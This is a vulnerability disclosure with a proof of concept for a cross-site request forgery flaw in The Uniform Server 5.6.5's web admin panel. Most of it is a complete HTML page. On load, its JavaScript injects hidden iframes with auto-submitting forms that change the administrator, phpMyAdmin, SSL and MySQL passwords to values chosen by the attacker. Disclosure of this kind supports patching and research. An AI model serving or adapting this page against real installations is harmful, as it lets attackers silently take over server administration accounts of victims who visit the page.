Uniform Server 5.6.5 Cross Site Request Forgery

`<!--=========================================================================================================#  
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #  
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #  
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #  
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #  
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #  
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #  
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #  
# #  
#============================================================================================================#  
# #  
# Vulnerability............Cross-site Request Forgery #  
# Software.................The Uniform Server 5.6.5 #  
# Download.................http://sourceforge.net/projects/miniserver/files/Uniform%20Server/ #  
# Date.....................5/15/10 #  
# #  
#============================================================================================================#  
# #  
# Site.....................http://cross-site-scripting.blogspot.com/ #  
# [email protected] #  
# #  
#============================================================================================================#  
# #  
# ##Description## #  
# #  
# A cross-site request forgery vunlerability in The Uniform Server 5.6.5 web UI can be exploited to change #  
# various administrative passwords. #  
# #  
# #  
# ##Proof of Concept## -->  
<html>  
<head>  
<script type="text/javascript">  
window.onload = function() {  
var url = 'http://localhost/apanel';  
  
var xsrs = [  
{  
"action": url + "/apsetup.php",  
"method": "post",  
"submitCall": "document.forms[0].submit.click()",  
"fields": [  
{ "name": "apuser", "value": "new_username" },  
{ "name": "appass", "value": "new_password" },  
{ "name": "submit", "value": "Change", "type": "submit" }  
]  
},  
{  
"action": url + "/psetup.php",  
"method": "post",  
"submitCall": "document.forms[0].submit.click()",  
"fields": [  
{ "name": "puser", "value": "new_username" },  
{ "name": "ppass", "value": "new_password" },  
{ "name": "submit", "value": "Change", "type": "submit" }  
]  
},  
{  
"action": url + "/sslpsetup.php",  
"method": "post",  
"submitCall": "document.forms[0].submit.click()",  
"fields": [  
{ "name": "puser", "value": "new_username" },  
{ "name": "ppass", "value": "new_password" },  
{ "name": "submit", "value": "Change", "type": "submit" }  
]  
},  
{  
"action": url + "/mqsetup.php",  
"method": "post",  
"submitCall": "document.forms[0].submit.click()",  
"fields": [  
{ "name": "qpass", "value": "new_password" },  
{ "name": "submit", "value": "Change", "type": "submit" }  
]  
}  
];  
  
for (var x = 0; x < xsrs.length; x++) {  
var attackFrame = document.createElement('iframe');  
  
var html = '<html><body><form action="' + xsrs[x].action + '" ' +  
'method="' + xsrs[x].method + '">';  
  
for (var y = 0; y < xsrs[x].fields.length; y++) {  
html += '<input type="' +  
(xsrs[x].fields[y].type != null ? xsrs[x].fields[y].type : 'hidden') + '" ' +  
'name="' + xsrs[x].fields[y].name + '" ' +  
'value="' + xsrs[x].fields[y].value + '" />';  
}  
  
html += '</form><script>' + xsrs[x].submitCall + '\x3c/script></body></html>';  
  
document.body.appendChild(attackFrame);  
  
attackFrame.contentDocument.write(html);  
}  
}  
</script>  
</head>  
<body>  
</body>  
</html>  
`